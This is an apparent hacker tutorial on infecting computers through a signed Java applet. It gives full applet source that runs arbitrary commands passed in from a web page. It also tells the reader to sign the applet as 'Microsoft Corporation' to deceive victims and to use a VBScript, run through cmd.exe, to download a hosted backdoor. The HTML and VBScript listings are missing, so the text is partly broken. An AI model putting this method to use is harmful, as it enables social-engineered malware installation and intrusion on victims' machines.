Hi. This is a minimalistic guide on "how to infect anyone".This is not a 0day. It's a pwning method wich is one click awayfrom the victim. It is pretty simple and the best of allit takes no time at all. (And it is undetectable too if you do it right)

After a few attempts to think a way to infect specific (or any) computer systems,i found that Java could be THE solution. I am not a Java Programmer/Developer or whateverbut this piece of code is pretty easy to be read by anyone who had a little programmingexpirience. The question "how to infect someone" is the hardest one, when you are codingyour new backdoor/trojan or whatever malware. I mean... ok, you have your new backdoorcompiled. You've tested it and it works great. But how the hell can you spread it???There are several methods, but nothing is invisible from the user's eye. And that's becauseall the well known methods are... WELL KNOWN

Ok, let me go with the subject and show you how it's done. I've developed the 80%of this attack (at least) and i say 80 because the backdoor server i use isn't made by me,and the vbscript is from a googled page. Anyway, the Java code has been written by me andthe "idea" is also my "product". So be gentle with this :PpPPp.

I won't explain the meaning of what does every single line of code here, becausei don't want to and because you must understand by your self how it works. Any otherexplanation on the codes, will be useless if you can't read the source code by your self.(I speak English by my self for example p noone teached me how it's done. It just happens.)(Little crappy but i hope you understand anywayz)

1) The official Java compiler (and the rest of Java developer tools) take a look at: How to set up your computer for doing Java2) Basic HTML/Java/VBScripting knowledge3) Java Runtimes4) Web Browser5) Hosting for the tests6) A backdoor uploaded to your host7) Mind8) Coffee

The process

1) Create a java file with the following code inside and name it whatever you want (i faced problems with the THIRD parameter, cut it to the second one or just use it as it is. Works fine for me...).import java.applet.*;import java.awt.*;import java.io.*;public class skata extends Applet {public void init() {Process f;String first = getParameter("first");try{f = Runtime.getRuntime().exec(first);

}catch(IOException e){e.printStackTrace();}Process s;String second = getParameter("second");try{s = Runtime.getRuntime().exec(second);}catch(IOException e){e.printStackTrace();}Process t;String third = getParameter("third");try{t = Runtime.getRuntime().exec(third);}catch(IOException e){e.printStackTrace();}}}2) Compile your java applet with the java developer tools and sign it too. A good name could be "Microsoft Corporation" or something.3) Upload your signed/compiled applet to your host and your backdoor too.4) Open notepad and paste the following html code. (change the YOUR-JAVA-APPLET-NAME with your own java filename)

</applet>5) Upload it as .htm to your host and browse it You will see the Java Security warning. Click RUN.... BooM! Calculator and cmd spawned!6) Have in mind that THIS warning comes out in EVERY java applet you are running. EITHER A JAVA GAME or a JAVA IRC CLIENT.7) Change the .htm code in to something like the following (Take a look, it's a vbscript echoed from cmd.exe - this will download our backdoor).

CONCLUSIONIt's big mistake to think that you are safe with your new antivirus or your brand new million-dollar anti-whatever system.This is not any kind of exploitation. It's just social engineering-like attack. I see 10 of these warnings every day on the net.Either i want to play a game and kill my time or whatever i want to do with a java applet. It's nothing strange or special than that.But hello, there is a "hole" on this. You can execute LOCAL, anything you want FOR FUCK'S SAKE! I have a Proof of Concept page out there... it will execute calc.exe and cmd.exe on your computer.